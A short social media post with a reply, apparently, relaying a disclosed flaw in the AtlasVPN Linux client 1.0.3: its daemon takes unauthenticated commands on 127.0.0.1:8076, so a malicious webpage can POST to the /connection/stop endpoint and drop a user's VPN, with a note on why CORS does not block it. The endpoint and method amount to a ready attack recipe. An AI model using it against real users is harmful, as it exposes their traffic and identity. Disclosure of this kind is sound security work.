Find of the day - someone dropped an AtlasVPN #0day on Reddit. The AtlasVPN daemon on Linux runs an HTTP server to accept CLI commands, it binds to 127.0.0.1:8076 by default.
What's hilarious is that it accepts commands without ANY authentication - so if you open a malicious webpage, that webpage can fire a POST to 127.0.0.1:8076/connection/stop and instantly disconnect your VPN.
Utter garbage.
Source: https://www.reddit.com/r/cybersecurity/comments/167f16e/atlasvpn_linux_client_103_remote_disconnect/
Proof below - used AtlasVPN's latest Linux client, version 1.0.3.
Really great question in the comments - how does this exploit bypass CORS?
The request to the AtlasVPN daemon meets the definition of a "simple request" - for legacy/compatibility reasons, servers don't have to "opt in" to receive requests that look like form submissions. :')
https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests
@tweedge CORS is just a suggestion anyway. The client has to choose to enforce it.